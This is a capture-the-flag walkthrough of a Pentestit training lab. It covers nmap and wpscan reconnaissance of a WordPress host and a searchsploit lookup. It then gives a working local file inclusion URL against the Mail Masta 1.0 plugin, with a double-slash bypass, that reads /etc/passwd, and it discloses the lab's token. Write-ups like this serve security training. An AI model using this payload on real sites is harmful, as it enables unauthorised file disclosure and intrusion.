Pentestit.ru - TEST LAB 14 - Site Token

Let’s start this awesome adventure!

You can start there > TEST LAB 14

We have 2 entry points addresses :

1
2
1. 192.168.101.14
2. 192.168.101.15

Let’s enumerate 192.168.101.14 first.

As always let’s start with a nmap scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ ip=192.168.101.14
$ nmap -sC -sV -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 15:00 EEST
Nmap scan report for site.test.lab (192.168.101.14)
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: 403 Forbidden
143/tcp  open  imap    Dovecot imapd
|_imap-capabilities: have AUTH=PLAIN more IDLE post-login listed LITERAL+ LOGIN-REFERRALS ID Pre-login SASL-IR capabilities ENABLE OK AUTH=LOGINA0001 IMAP4rev1
8080/tcp open  http    nginx
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_Requested resource was http://site.test.lab:8080/mail/

Let’s start with port 80, when we visit the webpage we get this error :

1
2
3
Hmm. We’re having trouble finding that site.

We can’t connect to the server at site.test.lab.

Why is happening this ?

Because of webserver virtual hosts.

vitrual hosts -> allows you to run more than one website on a single machine.

When we browse a machine using a domain name for example test.vulnhub the webserver will direct you to the content based on the host header. If we don’t do this and browse the machine with raw IP address, that header won’t be set properly and you’ll get a default page or error page.

We need to add this hostname into /etc/hosts

/etc/hosts -> translate hostnames to IP addresses

For windows users u can find it there -> c:\windows\system32\drivers\etc\hosts

We can aso use hosts file because it’s easier to remember the hostname/domain than the IP address.

Let’s add it.

1
2
3
# nano /etc/hosts
...
192.168.101.14  site.test.lab

Now we can see a wordpress site!

1
<meta name="generator" content="WordPress 5.0" />

Let’s run wpscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ wpscan --no-banner --url http://site.test.lab/ --enumerate p --random-user-agent
..junk data..
[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://site.test.lab/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt

Let’s search for possible exploits.

1
2
$ searchsploit mail masta
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt

Let’s test it out.

http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Gives us an error message hmm.. we can bypass that using // double slash.

That is an error probably in the developer’s code.

http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=//etc//passwd

In the end we can see this token_hrTY9s4Cv, we got it!

Site Token -> hrTY9s4Cv

See you, in the next step!